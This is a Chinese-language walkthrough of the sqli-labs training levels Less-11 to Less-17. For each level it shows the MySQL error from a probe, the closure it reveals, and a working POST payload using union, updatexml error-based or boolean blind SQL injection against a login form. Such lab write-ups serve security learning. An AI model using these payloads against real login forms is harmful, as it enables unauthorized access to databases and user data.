-
前言
做到这里的同学对前十题的注入步骤都应该了解了吧,下文步骤和前文Less1-10的差不多,所以本文主要讲述闭合和前文不一样的地方,完整过程记得自己重新操作一遍哦。
- Less-11
输入1不报错 输入1'报错 MySQL server version for the right syntax to use near 'c ' LIMIT 0,1' at line 1 闭合为' 注入参考前文联合注入union uname=1' union select 1,database()-- - &passwd=c &submit=Submit
-
Less-12
输入“报错 MySQL server version for the right syntax to use near 'c ") LIMIT 0,1' at line 1 可以看出闭合为") 参考联合注入union uname=1") union select 1,database()-- - &passwd=c &submit=Submit
-
Less-13
输入'报错 MySQL server version for the right syntax to use near 'c ') LIMIT 0,1' at line 闭合为') 但是使用order by可以求出显示位,使用select不能显示数据库 所以参考报错注入updatexml uname=-1') or updatexml(1,concat(0x7e,database()),0)-- - &passwd=c &submit=Submit
-
Less-14
输入"报错 MySQL server version for the right syntax to use near 'c " LIMIT 0,1' at line 1 闭合为" 参考报错注入updatexml() uname=-1" or updatexml(1,concat(0x7e,database()),0)-- - &passwd=c &submit=Submit
-
Less-15
输入' " )页面都不变化 这里选择布尔盲注 利用length()和ascii()来获取信息 输入1' or 1=1 -- -成功进入 输入1’ or length(database())=8-- -登录成功 详细步骤见布尔注入
-
Less-16
输入")登录成功 闭合为”) 判断数据库长度 uname=1") or length(database())=8-- - &passwd=c &submit=Submit 详细步骤见布尔注入
-
Less-17
根据提示 [PASSWORD RESET] Dhakkan 判断是密码重置,输入用户名Dhakkan uname=Dhakkan&passwd=1 &submit=Submit显示登录成功 uname=Dhakkan&passwd=1' &submit=Submit加一个单引号报错 MySQL server version for the right syntax to use near 'dhakkan'' at line 1 闭合为' uname=Dhakkan&passwd=1' or updatexml(1,concat(0x7e,database()),0)-- - &submit=Submit 成功显示数据库 详细步骤见报错注入updatexml()
tips:
方法不止一种,大家可以尝试不同的方法